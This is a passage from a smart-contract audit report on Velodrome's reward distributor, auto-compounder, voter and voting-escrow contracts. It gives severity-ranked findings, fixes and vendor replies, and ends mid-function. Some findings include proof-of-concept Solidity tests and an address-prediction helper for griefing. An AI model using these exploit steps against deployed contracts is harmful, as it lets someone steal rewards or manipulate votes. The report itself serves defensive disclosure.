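        require(nonce > 0 && nonce < 128, "simplified formula covers nonces 1..127 only");
        bytes32 digest = keccak256(abi.encodePacked(bytes1(0xd6), bytes1(0x94), deployer, bytes1(nonce)));
        return address(uint160(uint256(digest))); // the address is the last 20 bytes of the hash
    }
}

With only the SinkManager's address and a target nonce, an attacker can aim the 1024 griefing NFTs at a facilitator that does not exist yet, which is why an unpredictable salt defeats the attack.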
+6.2.2 RewardDistributor caching totalSupply leading to incorrect reward calculation
Severity: High Risk
Context: RewardsDistributor.sol#L136-L159
Description: RewardDistributor distributes newly minted VELO tokens to users who lock tokens in VotingEscrow. Since calculating past supply is costly, the rewardDistributor caches the supply value in uint256[1000000000000000] public veSupply. The RewardDistributor._checkpointTotalSupply function iterates from the last updated time until the latest epoch time, fetches totalSupply from votingEscrow, and stores it.
Assume the following scenario, where a transaction is executed at the beginning of an epoch:
1. The totalSupply is X.
2. The user calls checkpointTotalSupply. The rewardDistributor saves totalSupply = X.
3. The user creates a lock with 2X the amount of tokens. The user has balance = 2X and the totalSupply becomes 3X.
4. Fast forward to when the reward is distributed. The user claims the tokens; the reward is calculated as total reward * balance / supply, and the user gets 2x the total rewards.
Recommendation: This issue shares a lot of similarities with "Reward calculates earned incorrectly on each epoch boundary", at a lower severity. The quick fix would be to stop the rewardDistributor from caching totalSupply while it can still increase:

function _checkpointTotalSupply() internal {
    address _ve = ve;
    uint256 t = timeCursor;
    uint256 roundedTimestamp = (block.timestamp / WEEK) * WEEK;
    IVotingEscrow(_ve).checkpoint();

    for (uint256 i = 0; i < 20; i++) {
-       if (t > roundedTimestamp) {
+       if (t >= roundedTimestamp) {
            break;
        } else {
            // fetch last global checkpoint prior to time t
            uint256 epoch = _findTimestampEpoch(t);
            IVotingEscrow.GlobalPoint memory pt = IVotingEscrow(_ve).pointHistory(epoch);
            int128 dt = 0;
            if (t > pt.ts) {
                dt = int128(int256(t - pt.ts));
            }
            // walk forward voting power to time t
            veSupply[t] = uint256(int256(max(pt.bias - pt.slope * dt, 0))) + pt.permanentLockBalance;
        }
        t += WEEK;
    }
    timeCursor = t;
}

Given that similar issues occur multiple times in the code base and how nuanced this issue can be, we recommend not caching totalSupply in the rewardDistributor and instead fetching totalSupply from the votingEscrow every time it is needed.
Velodrome: Fixed in commit 2d7f02. RewardDistributor now fetches totalSupply and balanceOf from votingEscrow at 1 second before the epoch flip.
Spearbit: Verified.
6.3 Medium Risk
+6.3.1 Lack of slippage control during compounding
Severity: Medium Risk
Context: AutoCompounder.sol#L78, AutoCompounder.sol#L91
Description: When swapping reward tokens to VELO tokens during compounding, slippage control is disabled by configuring amountOutMin to zero. This can potentially expose the swap/trade to sandwich attacks and MEV (Miner Extractable Value) attacks, resulting in a suboptimal amount of VELO tokens received from the swap/trade.

router.swapExactTokensForTokens(
    balance,
    0, // amountOutMin
    routes,
    address(this),
    block.timestamp
);

Recommendation: Consider implementing some form of slippage control to reduce the risks associated with sandwich and MEV attacks. Since the claimBribesAndCompound and claimFeesAndCompound functions are permissionless, the slippage parameters should be dynamically computed before the trade; otherwise, malicious users could set an excessively high slippage tolerance enabling large price deviations, combined with a sandwich attack to extract the maximum value from the trade. One possible solution is to dynamically compute the minimum amount of VELO tokens to be received after the trade, based on the maximum allowable slippage percentage (e.g. 5%) and the exchange rate (source token <> VELO) from a source that cannot be manipulated (e.g. Chainlink, a custom TWAP); this is sketched below. Alternatively, consider restricting access to these functions to certain actors who can be trusted to define an appropriate slippage parameter where possible.
Velodrome: See commit b4283f for the proposed fix. Another thing to note is that Optimism does not currently enable MEV / sandwiching due to its private mempool, so the only possibility of this MEV happening is in a protocol change.
Spearbit: Fixed.
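A sketch of the dynamic minimum-out computation described above; the 18-decimal oracle price and the 5% bound are illustrative assumptions:

pragma solidity ^0.8.13;

library SlippageLib {
    uint256 internal constant MAX_SLIPPAGE_BPS = 500; // assumed 5% tolerance

    // oraclePriceE18: VELO per unit of source token, scaled by 1e18, taken from
    // a manipulation-resistant source (e.g. Chainlink or a custom TWAP)
    function minAmountOut(uint256 amountIn, uint256 oraclePriceE18) internal pure returns (uint256) {
        uint256 expectedOut = (amountIn * oraclePriceE18) / 1e18; // expected VELO at the oracle rate
        return (expectedOut * (10_000 - MAX_SLIPPAGE_BPS)) / 10_000; // allow at most MAX_SLIPPAGE_BPS deviation
    }
}

The result would then be passed as amountOutMin in place of the hardcoded zero.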
+6.3.2 ALLOWED_CALLER can steal all rewards from AutoCompounder using a fake factory in the route
Severity: Medium Risk
Context: AutoCompounder.sol#L187
Description: AutoCompounder allows an address with the ALLOWED_CALLER role to trigger swapTokenToVELOAndCompound. The function sells the specified tokens for VELO. Since the Velo router supports multiple factories, an attacker can deploy a fake factory with a backdoor; by routing the swaps through the backdoor factory, the attacker can steal all reward tokens in the AutoCompounder contract.
Recommendation: As mentioned by the Velodrome team, only certain factories can be allowed in the route. One potential solution could be to check the factory in the routes against the registry to see if it is approved. Beyond the fix, the risk should be acknowledged and more attention paid to permission management: ALLOWED_CALLER can always steal the rewards. As noted in the issue "Lack of slippage control during compounding", an attacker can steal the tokens by sandwiching the trades. This is a current limitation of DeFi; there is no easy way to prevent it without an oracle.
Velodrome: Fixed code in commit 24e50b. We had originally implemented the fix and then determined that the bigger risk for a user would be calling the router from a frontend that can pass in any arbitrary factory. This would be a risk, as a compromised website could correctly interact with the router by using a fake factory and act maliciously. With commit 24e50b we ensure that any interaction with the router is done with a PoolFactory approved by our registry. We also made a change to the registry where once a PoolFactory is approved, it will always appear as a registered PoolFactory.
Spearbit: Verified.
+6.3.3 depositManaged can be used by locks to receive unvested VELO rebase rewards
Severity: Medium Risk
Context: RewardsDistributor.sol#L134-L143
Description: Velo offers rebase emissions to all lockers. These are meant to be added via depositFor into an existing lock, and transferred directly only if the lock has just expired. The check is the following:

if (_timestamp > _locked.end && !_locked.isPermanent) {

By calling depositManaged we can get the check to pass for a lock that is not expired, allowing us to receive unvested VELO (which we could, for example, sell unfairly). Due to how depositManaged and withdrawManaged work, the attacker would be able to perform this every other week (1 week cooldown, 1 week execution). Because managedRewards are delayed by a week, the attacker will not lose any noticeable amount of rewards, meaning that most users would rationally opt into performing this operation to gain an unfair advantage, or to sell their rewards each week while other lockers are unable or unwilling to do so.
The following POC shows an increase in the VELO balance of the tokenId2 owner in spite of the fact that the lock is not expired.

Logs:
Epoch 1
Token Locked after    56039811453980167852
Token2 Locked after  -1000000000000000000000000 // Negative because we have `depositManaged`
User Bal after        56039811453980167852      // We received the token directly, unvested

function testInstantClaimViaManaged() public {
    // Proof that if we depositManaged, we can get our rebase rewards instantly
    // instead of having to vest them via the lock
    skipToNextEpoch(1 days);
    minter.updatePeriod();
    console2.log("Epoch 1");

    VELO.approve(address(escrow), TOKEN_1M * 2);
    uint256 tokenId = escrow.createLock(TOKEN_1M, MAXTIME);
    uint256 tokenId2 = escrow.createLock(TOKEN_1M, MAXTIME);
    uint256 mTokenId = escrow.createManagedLockFor(address(this));

    skipToNextEpoch(1 hours + 1);
    minter.updatePeriod();
    skipToNextEpoch(1 hours + 1);
    minter.updatePeriod();

    // Now we claim for 1, showing that the claim increases the locked amount
    int128 initialToken1 = escrow.locked(tokenId).amount;
    distributor.claim(tokenId); // Claimed from previous epoch
    console2.log("Token Locked after ", escrow.locked(tokenId).amount - initialToken1);

    // For 2, we deposit managed, then claim, showing we get the tokens unlocked
    uint256 initialBal = VELO.balanceOf(address(this));
    int128 initialToken2 = escrow.locked(tokenId2).amount;
    voter.depositManaged(tokenId2, mTokenId);
    distributor.claim(tokenId2); // Claimed from previous epoch
    console2.log("Token2 Locked after ", escrow.locked(tokenId2).amount - initialToken2);
    console2.log("User Bal after ", VELO.balanceOf(address(this)) - initialBal);
}

Recommendation: At this time, it seems the best suggestion would be to check whether the token is managed, and if it is, to depositFor the managed token.
Velodrome: This finding is valid and a user can in fact redirect the rebase to their account instead of their tokenId. There are a couple of key things to note here:
• depositFor() into the (m)veNFT would distribute the rebase to all lockers within the (m)veNFT.
• distributor.claim() is publicly callable on behalf of any tokenId.
Given these conditions, a user may unknowingly have a rebase to claim but deposit into the (m)veNFT. If we went with the proposed solution of depositFor() into the (m)veNFT, a malicious caller could see this pending claim and have it distributed to everyone within the (m)veNFT. I believe the best solution would integrate distributor.claim() within depositManaged() so that the claim is automatically done and given to the rightful owner.
Spearbit: Great points. A check has been added that causes a revert on claiming if the lock is in a managed position; that also may be sufficient. By not allowing the tokens to be distributed, they will be distributed exclusively to the lock once it's withdrawn from the managed position. This should ensure that those rebase rewards are at least unlocked at the time the user's lock expires, which seems more in line with the design of not allowing rebase rewards to be liquid immediately.
Velodrome: Right, the fix you mention is within commit 0323be.
Spearbit: Fixed.
6.4 Low Risk
+6.4.1 Unnecessary slippage loss due to AutoCompounder selling VELO
Severity: Low Risk
Context: AutoCompounder.sol#L78-L85, AutoCompounder.sol#L91-L98
Description: AutoCompounder allows any address to help claim the rewards and compound them into the locked VELO position. The AutoCompounder will sell _tokensToSwap for VELO. By setting VELO itself as _tokensToSwap, the AutoCompounder would do an unnecessary swap that leads to unnecessary slippage loss.
Recommendation: Check _tokensToSwap != address(VELO).
Velodrome: Fixed in commit ffb016. Spearbit: Fixed.
+6.4.2 epochVoteStart function calls the wrong library method
Severity: Low Risk
Context: Voter.sol#L111
Description: The epochVoteStart function calls VelodromeTimeLibrary.epochStart instead of VelodromeTimeLibrary.epochVoteStart. Thus, the Voter.epochVoteStart function returns a voting start time without factoring in the one-hour distribution window, which might cause issues for users and developers relying on this information.
Recommendation: Consider making the following change to the Voter.epochVoteStart function:

function epochVoteStart(uint256 _timestamp) external pure returns (uint256) {
-   return VelodromeTimeLibrary.epochStart(_timestamp);
+   return VelodromeTimeLibrary.epochVoteStart(_timestamp);

Velodrome: Fixed in commit f7eb2f. Spearbit: Verified.
+6.4.3 Managed NFT can vote more than once per epoch under certain circumstances
Severity: Low Risk
Context: Voter.sol#L286
Description: The owner of a managed NFT could break the invariant that an NFT can only vote once per epoch. Assume Bob owns the following two (2) managed NFTs:
• Managed veNFT (called mNFTa) with one (1) locked NFT (called lNFTa)
• Managed veNFT (called mNFTb) with one (1) locked NFT (called lNFTb)
• The balance of lNFTa and lNFTb is the same
Bob voted on pool X with mNFTa and mNFTb in the first hour of the epoch. In the last two hours of the voting window of the current epoch, Bob changed his mind and decided to vote on pool Y. Under normal circumstances, the onlyNewEpoch modifier would prevent mNFTa and mNFTb from triggering the Voter.vote function, because these two veNFTs have already voted in the current epoch and their lastVoted is set to a timestamp within the current epoch. However, Bob can bypass this control. Bob calls the Voter.withdrawManaged function to withdraw lNFTa and lNFTb from mNFTa and mNFTb respectively. Since the weight becomes zero, the lastVoted for both mNFTa and mNFTb is cleared; as a result, they are allowed to re-vote in the current epoch. Bob calls Voter.depositManaged to deposit lNFTb into mNFTa and lNFTa into mNFTb respectively, to increase the weight of the managed NFTs. Bob then calls Voter.vote with mNFTa and mNFTb to vote on pool Y. Since lastVoted is empty (cleared earlier), the onlyNewEpoch modifier will not revert the transaction.
It is understood that without clearing lastVoted, another potential issue would arise where a new managed NFT could be made temporarily useless for an epoch. Given that managed NFTs grant significant power to the owner, the team intends to restrict access to managed NFTs and manage abuse by utilizing the emergency council/governor to deactivate non-compliant managed NFTs, thus mitigating the risks of this issue.
Recommendation: To prevent any managed NFT owner from abusing this issue, consider disallowing re-voting in the current epoch once the last NFT has been withdrawn from a managed NFT.
Velodrome: This potential interaction was built from commit 6b95f9 and is going to remain in the codebase. We acknowledge there is a risk of vote-signaling abuse by changing the vote at the last second. However, there is a greater risk of the managed veNFT holder losing their ability to vote if lockers decide to withdraw from the (m)veNFT. In signaling abuse, trust is given to the (m)veNFT voter, the same user who has the power to vote. In disallowing re-voting, trust is given to the lockers, whom the (m)veNFT voter has no control over. We understand the additional economics of (m)veNFT vote changes and intend to create (m)veNFTs on a partner-by-partner basis. If this voting change is abused by a partner, the team is able to disable the (m)veNFT from voting again.
Spearbit: Acknowledged.
+6.4.4 Invalid route is returned if token does not have a trading pool
Severity: Low Risk
Context: CompoundOptimizer.sol#L79
Description: Assume that someone called the getOptimalTokenToVeloRoute function with a token T that does not have a trading pool within Velodrome. While looping through all ten routes pre-defined in the constructor at Line 94 below, since no trading pool with T exists, the loop keeps skipping to the next route until it ends. As such, index remains uninitialized at the end, meaning it holds the default value of zero. In Lines 110 to 112, it will conclude that the optimal route is as follows:

routes[0] = routesTokenToVelo[index][0] = routesTokenToVelo[0][0] = address(0) <> USDC
routes[1] = routesTokenToVelo[index][1] = routesTokenToVelo[0][1] = USDC <> VELO
routes[0].from = token = T
routes = T <> USDC <> VELO

As a result, the getOptimalTokenToVeloRoute function returns an invalid route.

function getOptimalTokenToVeloRoute(
    address token,
    uint256 amountIn
) external view returns (IRouter.Route[] memory) {
    // Get best route from multi-route paths
    uint256 index;
    uint256 optimalAmountOut;
    IRouter.Route[] memory routes = new IRouter.Route[](2);
    uint256[] memory amountsOut;

    // loop through multi-route paths
    for (uint256 i = 0; i < 10; i++) {
        routes[0] = routesTokenToVelo[i][0];
        // Go to next route if a trading pool does not exist
        if (IPoolFactory(routes[0].factory).getPair(token, routes[0].to, routes[0].stable) == address(0)) continue;

        routes[1] = routesTokenToVelo[i][1];
        // Set the from token as storage does not have an address set
        routes[0].from = token;
        amountsOut = router.getAmountsOut(amountIn, routes);
        // amountOut is in the third index - 0 is amountIn and 1 is the first route output
        uint256 amountOut = amountsOut[2];
        if (amountOut > optimalAmountOut) {
            // store the index and amount of the optimal amount out
            optimalAmountOut = amountOut;
            index = i;
        }
    }

    // use the optimal route determined from the loop
    routes[0] = routesTokenToVelo[index][0];
    routes[1] = routesTokenToVelo[index][1];
    routes[0].from = token;

    // Get amountOut from a direct route to VELO
    IRouter.Route[] memory route = new IRouter.Route[](1);
    route[0] = IRouter.Route(token, velo, false, factory);
    amountsOut = router.getAmountsOut(amountIn, route);

    // compare output and return the best result
    return amountsOut[1] > optimalAmountOut ? route : routes;
}

Recommendation: If none of the routes supports the token, consider reverting the transaction instead of returning a route built upon an uninitialized index:

+ bool routeFound = false;
  for (uint256 i = 0; i < 10; i++) {
      routes[0] = routesTokenToVelo[i][0];
      // Go to next route if a trading pool does not exist
-     if (IPoolFactory(routes[0].factory).getPair(token, routes[0].to, routes[0].stable) == address(0)) continue;
+     if (IPoolFactory(routes[0].factory).getPair(token, routes[0].to, routes[0].stable) == address(0)) {
+         continue;
+     } else {
+         routeFound = true;
+     }
      ..SNIP..
  }
+ if (!routeFound) revert NoRouteFound();

Velodrome: Fixed in commit 367ecf. Spearbit: Verified.
+6.4.5 SafeApprove is not used in AutoCompounder Severity: Low Risk Context: AutoCompounder.sol#L186 AutoCompounder.sol#L109 Description: safeApprove is not used in AutoCompounder. Tokens that do not follow standard ERC20 will be locked in the contract. Recommendation: Use safeApprove and clear the allowance before calling token contracts. IERC20(token).safeApprove(address(router), 0); IERC20(token).safeApprove(address(router), balance); Velodrome: Fixed in commit 10ae5c. Spearbit: Verified. +6.4.6 balanceOfNFT can be made to return non-zero value via split and merge Severity: Low Risk Context: VotingEscrow.sol#L1059-L1060 Description: Ownership Change Sidestep via Split. Splitting allows to change the ID, and have it work. This allows to sidestep this check in VotingEscrow.sol#L1052-L1055 Meaning you can always have a non-zero balance although it requires performing some work. This could be used by integrators as a way to accurately track their own voting power. Recommendation: At this time, no specific vulnerability was found besides the ability to sidestep this view func- tion, so no action seems to be required beside flagging this to future integrators. 69 Velodrome: A couple things here: • In merge, one veNFT is burned and the other increases balance. In split, two fresh veNFTs are minted to the owner of the split veNFT, and the split veNFT is burned. • Ownership change tracking are solely done to protect against flash-voting from transferFrom(). It's worth acknowledging that yes, from these functions the locked balance changes. However, I do not see a vulnerability from these functions. Spearbit: By performing a split and merge you'd be able to vote in the same block, however, you'd be doing so by breaking the lock and using another tokenId. Something important to consider around flashloans with splitting, is that you could split the token to leave a dust amount (but maintain the tokenId) and you'd be able to vote because the newly create tokenId would not have ownershipChange set We weren't able to use this to bypass anything meaningful besides being able to use _delegate or balanceOf in the same tx / block as the transferFrom +6.4.7 delegateBySig can use malleable signatures Severity: Low Risk Context: VotingEscrow.sol#L1202-L1203 Description: Because the function delegateBySig uses ecrecover and doesn't check for the value of the sig- nature, other signatures, that have higher numerical values, which map to the same signature, could be used. Because the code uses nonces only one signature could be used per nonce. Recommendation: Consider using ECDSA by Open Zeppelin, or adding the check they use here. Velodrome: Fixed in commit ebe3af. Spearbit: Fixed. +6.4.8 Slightly Reduced Voting Power due to Rounding Error Severity: Low Risk Context: BalanceLogicLibrary.sol#L99-L100 Description: Because of rounding errors, a fully locked NFT will incur a slight loss of Vote Weight (around 27 BPS). 
+6.4.8 Slightly reduced voting power due to rounding error
Severity: Low Risk
Context: BalanceLogicLibrary.sol#L99-L100
Description: Because of rounding errors, a fully locked NFT will incur a slight loss of vote weight (around 27 BPS).

[PASS] testCompareYieldOne() (gas: 4245851)
Logs:
  distributor.claimable(tokenId) 0
  locked.amount 1000000000000000000000000
  block.timestamp 1814399
  block.timestamp 1900800
  Epoch 2
  distributor.claimable(tokenId) 0
  locked.amount 1000000000000000000000000
  escrow.userPointHistory(tokenId, 1) 0
  escrow.userPointHistory(tokenId, 1) 1814399
  escrow.userPointHistory(tokenId, 1) BIAS 997260281900050656907546
  escrow.userPointHistory(tokenId, tokenId2) 1814399
  escrow.userPointHistory(tokenId, tokenId2) BIAS 997260281900050656907546
  userPoint.ts 1814399
  getCursorTs(tokenId) 1814400
  userPoint.ts 1814399
  epochStart(tokenId) 1814400
  userPoint.ts 1814399
  ve.balanceOfNFTAt(tokenId, getCursorTs(tokenId) - 1) 997260281900050656907546

function getCursorTs(uint256 tokenId) internal returns (uint256) {
    IVotingEscrow.UserPoint memory userPoint = escrow.userPointHistory(tokenId, 1);
    console2.log("userPoint.ts", userPoint.ts);
    uint256 weekCursor = ((userPoint.ts + WEEK - 1) / WEEK) * WEEK;
    uint256 weekCursorStart = weekCursor;
    return weekCursorStart;
}

function epochStart(uint256 timestamp) internal pure returns (uint256) {
    unchecked {
        return timestamp - (timestamp % WEEK);
    }
}

function testCompareYieldOne() public {
    skipToNextEpoch(1 days); // Epoch 1
    skipToNextEpoch(-1); // last second

    VELO.approve(address(escrow), TOKEN_1M * 2);
    uint256 tokenId = escrow.createLock(TOKEN_1M, MAXTIME);
    uint256 tokenId2 = escrow.createLock(TOKEN_1M, 4 * 365 * 86400);
    uint256 mTokenId = escrow.createManagedLockFor(address(this));

    console2.log("distributor.claimable(tokenId)", distributor.claimable(tokenId));
    console2.log("locked.amount", escrow.locked(tokenId).amount);
    console2.log("block.timestamp", block.timestamp);

    minter.updatePeriod(); // Update for 1
    skipToNextEpoch(1 days); // Go next epoch
    minter.updatePeriod(); // and update 2

    console2.log("block.timestamp", block.timestamp);
    console2.log("Epoch 2");

    //@audit here we have claimable for tokenId and mTokenId
    IVotingEscrow.LockedBalance memory locked = escrow.locked(tokenId);
    console2.log("distributor.claimable(tokenId)", distributor.claimable(tokenId));
    console2.log("locked.amount", escrow.locked(tokenId).amount);
    console2.log("escrow.userPointHistory(tokenId, 1)", escrow.userPointHistory(tokenId, 0).ts);
    console2.log("escrow.userPointHistory(tokenId, 1)", escrow.userPointHistory(tokenId, 1).ts);
    console2.log("escrow.userPointHistory(tokenId, 1) BIAS", escrow.userPointHistory(tokenId, 1).bias);
    console2.log("escrow.userPointHistory(tokenId, tokenId2)", escrow.userPointHistory(tokenId2, 1).ts);
    console2.log("escrow.userPointHistory(tokenId, tokenId2) BIAS", escrow.userPointHistory(tokenId2, 1).bias);
    console2.log("getCursorTs(tokenId)", getCursorTs(tokenId));
    console2.log("epochStart(tokenId)", epochStart(getCursorTs(tokenId)));
    console2.log("ve.balanceOfNFTAt(tokenId, getCursorTs(tokenId) - 1)", escrow.balanceOfNFTAt(tokenId, getCursorTs(tokenId) - 1));
}

Recommendation: A no-fix seems acceptable given the ability of end users to use permanent locks. Since these types of locks offer 100% of the voting power, they may be the preferred option for end users.
Velodrome: The team is aware of this and has kept it intentionally to encourage permanent locks. Spearbit: Acknowledged.
+6.4.9 Some setters cannot be changed by governance
Severity: Low Risk
Context: Voter.sol#L151-L155
Description: It was found that some setters, related to emergencyCouncil and Team, can only be called by the current role owner. It may be best to allow governance to also call such setters, as a way for it to override or replace a misaligned team. The emergency council can kill gauges, preventing those gauges from receiving emissions (Voter.sol#L151-L155):

function setEmergencyCouncil(address _council) public {
    if (_msgSender() != emergencyCouncil) revert NotEmergencyCouncil();
    if (_council == address(0)) revert ZeroAddress();
    emergencyCouncil = _council;
}

The team can simply change the ArtProxy, which is a cosmetic aspect of VotingEscrow (VotingEscrow.sol#L241-L245):

function setTeam(address _team) external {
    if (_msgSender() != team) revert NotTeam();
    if (_team == address(0)) revert ZeroAddress();
    team = _team;
}

Recommendation: Consider allowing governance to change the addresses holding these roles.
Velodrome: This design is intentional to prevent a governance takeover. There is always the ability to give governance the team role once governance has been properly established. Spearbit: Acknowledged.
+6.4.10 Rebase rewards distribution is shifted by one week, allowing new depositors to receive unfair yield initially (which they'll give back after they withdraw)
Severity: Low Risk
Context: Reward.sol#L187-L188
Description: The finding is not particularly dangerous, but it is notable that because Reward allows claiming of rewards in the following epoch, and because rebase rewards from the distributor (Distributor.claim) are distributed based on the balance at the last second of the previous epoch, a desynchronization in how rewards are distributed will happen. This ends up being fair in the long run; however, here is an illustrative scenario:
• Locker A has a small lock and wishes to increase the amount they have locked.
• They increase the amount but miss out on rebase rewards (because those are based on their balance at the last second of the previous epoch).
• They decide to depositManaged, which will distribute rewards based on their current balance, meaning they will "steal" a marginal part of the yield.
• The next epoch, their weight will help increase the yield for everyone, and because rebasing rewards are distributed with a week of delay, they will eventually miss out on a similar proportion of yield to what they "stole".
Recommendation: Consider documenting the behavior in the user documentation.
Velodrome: Managed NFTs are intended to be used as long-term vehicles for compounding/farming. We think this is an acceptable trade-off for automation, and it does even out over time. Spearbit: Acknowledged.
+6.4.11 AutoCompounder can be created without admin
Severity: Low Risk
Context: AutoCompounderFactory.sol#L40
Description: Creating an AutoCompounder contract without an _admin, by passing address(0) through AutoCompounderFactory, is possible. This will break certain functionalities in the AutoCompounder.
Recommendation: It is recommended to add a check on the _admin parameter.
Velodrome: Fix commit 74130d. Spearbit: Fixed.
+6.4.12 claim and claimMany functions will revert when called at end lock time
Severity: Low Risk
Context: RewardsDistributor.sol#L136, RewardsDistributor.sol#L161
Description: If _timestamp == _locked.end, then depositFor() will be called, but this will revert because block.timestamp >= oldLocked.end.
Recommendation: It is recommended to change the validation as follows:

- if (_timestamp > _locked.end && !_locked.isPermanent) {
+ if (_timestamp - 1 > _locked.end && !_locked.isPermanent) {

Velodrome: Fix commit 3aa5bf. Opted to keep the same value comparison as VotingEscrow and used if (timestamp >= _locked.end .... Spearbit: Fixed.
Opted to keep the same value comparison as VotingEscrow and used if (timestamp >= _locked.end ....
Spearbit: Fixed.
+6.4.13 Malicious Pool Factory can be used to prevent new pools from being voted on as well as brick voting locks
Severity: Low Risk
Context: Voter.sol#L322-L381
Description: Because gauges[_pool] can only be set once in the voter, governance has the ability to introduce a malicious factory that reverts on command, as a way to prevent normal protocol functionality as well as to prevent depositors that voted on these gauges from ever being able to unlock their NFTs:
• ve.withdraw requires not having voted.
• To remove a vote, reset is called, which in turn calls IReward(gaugeToFees[gauges[_pool]])._withdraw(uint256(_votes), _tokenId);.
• If a malicious gaugeToFees contract is deployed, the tokenId will never be able to set voted back to false, preventing it from ever withdrawing.
Recommendation: It's worth ensuring that no such malicious factory is introduced, which can be achieved by setting up proper gauges initially for most pools. To ensure this doesn't happen in the future, vetoing governance proposals may initially be necessary until sufficient decentralization is achieved.
Velodrome: It is worth acknowledging the risks of governance and upgradeability within Voter. There is a possibility of a "bad" gauge being created which could freeze the votes of a veNFT, and new gauge creation requires the diligence of the team and users to prevent this exploit from happening. Aside from the assumptions mentioned above, there are several steps already in place to additionally support the intended experience of the protocol:
• Fallback factories to ensure there is always a trusted gauge for a set of tokens.
• FE management by the team to display only legitimate gauges.
Monitoring is definitely needed to ensure governance works as intended. Fortunately, in this case, even after a "bad" gauge is created, a user is not at risk until they submit a transaction depositing into the new gauge.
Spearbit: Acknowledged.
+6.4.14 Pool will stop working if a pausable / blockable token is blocked
Severity: Low Risk
Context: Pool.sol
Description: Some tokens are pausable or implement a block list (e.g. USDC). If such a token is part of a Pool and the Pool is blocked, the Pool will stop working. It's important to notice that the LP token, which wraps a deposit, will still be transferable, and the composability with Gauges and Reward Contracts will not be broken even when the pool is unable to function.
Recommendation: It may be best to disclose such risks in the documentation; however, these are inherent risks of using such tokens (USDC included) and are not specifically attributable to the code in scope.
Velodrome: Acknowledged. Pausing a token would prevent LPs from withdrawing, freeze swaps, and block all claimable rewards of the token.
Spearbit: Acknowledged.
6.5 Gas Optimization
+6.5.1 Use ClonesWithImmutableArgs in AutoCompounderFactory saves gas
Severity: Gas Optimization
Context: AutoCompounderFactory.sol#L40
Description: The AutoCompounderFactory can utilize ClonesWithImmutableArgs to deploy new AutoCompounder contracts. This would save a lot of gas compared to the current implementation; a sketch of the pattern is shown below.
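As an illustration only, here is a minimal sketch of the pattern, assuming the wighawag/clones-with-immutable-args library; the import path, the AutoCompounderCloneFactory name, and the choice of immutable arguments are assumptions, not the project's actual code:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Assumed import path for the wighawag/clones-with-immutable-args library.
import {ClonesWithImmutableArgs} from "clones-with-immutable-args/ClonesWithImmutableArgs.sol";

// Hypothetical factory sketch: each AutoCompounder becomes a tiny proxy whose
// "immutable" arguments are appended to the clone's bytecode instead of being
// written to storage, making both deployment and argument reads cheaper.
contract AutoCompounderCloneFactory {
    using ClonesWithImmutableArgs for address;

    address public immutable implementation; // deployed once, cloned many times

    constructor(address _implementation) {
        implementation = _implementation;
    }

    function createAutoCompounder(address _admin, address _escrow) external returns (address clone) {
        // The encoded arguments become part of the clone's code; the
        // implementation reads them back with CODECOPY-based helpers
        // (the library's Clone base contract) instead of SLOADs.
        clone = implementation.clone(abi.encodePacked(_admin, _escrow));
    }
}

The implementation side would inherit the library's Clone helper and read the arguments via byte offsets (e.g. _getArgAddress(0) and _getArgAddress(20)), which is where the per-call gas saving comes from.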
Recommendation: It is recommended to use the ClonesWithImmutableArgs library.
Spearbit: This is an audit that was done by Spearbit using the same library: spearbit-audit-amm.pdf. For the sake of transparency, a recent exploit related to upgrades and clones was found in Astaria; it's worth checking the post-mortem once made available: AstariaXYZ twitter.
Velodrome: Okay, thank you for sharing. We will leave the code as-is. No gas optimization is worth any change in protocol security.
Spearbit: Acknowledged.
+6.5.2 Convert hardcoded route to internal function in CompoundOptimizer
Severity: Gas Optimization
Context: CompoundOptimizer.sol#L37-L75
Description: All of the hardcoded route setups can be converted to an internal function with hardcoded values.
Recommendation: The recommendation is to convert all of the hardcoded route setups to an internal function with hardcoded values.
Velodrome: Implemented commit 505626.
Spearbit: Fixed.
+6.5.3 Early return in supplyAt saves gas
Severity: Gas Optimization
Context: BalanceLogicLibrary.sol#L120-L122
Description: To save gas, the early return for the case where _epoch is equal to zero can be made before caching _point.
Recommendation: It is recommended to return before caching _point.
Velodrome: Code change commit d323b0.
Spearbit: Fixed.
6.6 Informational
+6.6.1 Approved User could Split NFTs and be unable to continue operating
Severity: Informational
Context: VotingEscrow.sol#L973-L974
Description: A user can be approved via approve; the storage value set is idToApprovals[_tokenId] = _approved;. Splitting will create two new NFTs that are sent to the owner. This means that an approved user would be able to split the NFTs on behalf of the owner; however, in doing so they would lose access to the NFTs, being unable to continue using them during the transaction.
Recommendation: This is at most a gotcha to integrators, so there's no particular risk.
Velodrome: Updated docs commit d912a1.
Spearbit: Fixed.
+6.6.2 Add sweep function to CompoundOptimizer
Severity: Informational
Context: CompoundOptimizer.sol
Description: Some tokens may be completely illiquid or not worth auto-compounding, so it would be best to also allow a way to sweep such tokens out to the owner. Examples:
• Airdrops / Extra rewards.
• Very new tokens that the owner wants to farm instead of dump.
Recommendation: It is recommended to create a sweep functionality.
Velodrome: We will implement a sweep solution in which the team manages a list of tokens that cannot be swept. Tokens that cannot be swept are tokens with high liquidity (USDC, DAI, etc.). This list can only be added to, not removed from, for additional trust. The admin is allowed to sweep any tokens that are not on this list within the first 24 hours after the epoch flip. Trusted keepers will not be able to swap any tokens within the first 24 hours to prevent a race to sweep.
Spearbit: Acknowledged.
+6.6.3 Allow Manual Suggestion of Pair in AutoCompounder
Severity: Informational
Context: CompoundOptimizer.sol#L79-L82
Description: Allow manual suggestion of token pairs such as USDC, USDT, LUSD, and wBTC. It may be best to pass a list of pairs as parameters to check for additional tokens. Ultimately, if a suggested pair offers a better price, there's no reason not to allow it. The caller should be able to pass a suggested optimal route, which can then be compared against other routes; whichever route is best should be used. If the user's suggested route is the best one, use theirs and ensure that the swap goes through. A sketch of such a comparison follows.
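Purely as an illustration of the suggested mechanism, here is a hedged sketch of comparing a caller-suggested route against the optimizer's own candidate; the IRouterLike interface, its Route struct, and the contract and function names are simplified assumptions and do not mirror the actual CompoundOptimizer or Velodrome router API:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Assumed, simplified router interface; the real router's Route struct and
// getAmountsOut signature may differ.
interface IRouterLike {
    struct Route {
        address from;
        address to;
        bool stable;
    }

    function getAmountsOut(uint256 amountIn, Route[] memory routes)
        external
        view
        returns (uint256[] memory amounts);
}

// Hypothetical helper: quote both routes and keep whichever returns more.
contract RouteSelectionSketch {
    IRouterLike public immutable router;

    constructor(IRouterLike _router) {
        router = _router;
    }

    function _quote(IRouterLike.Route[] memory routes, uint256 amountIn) internal view returns (uint256) {
        if (routes.length == 0) return 0;
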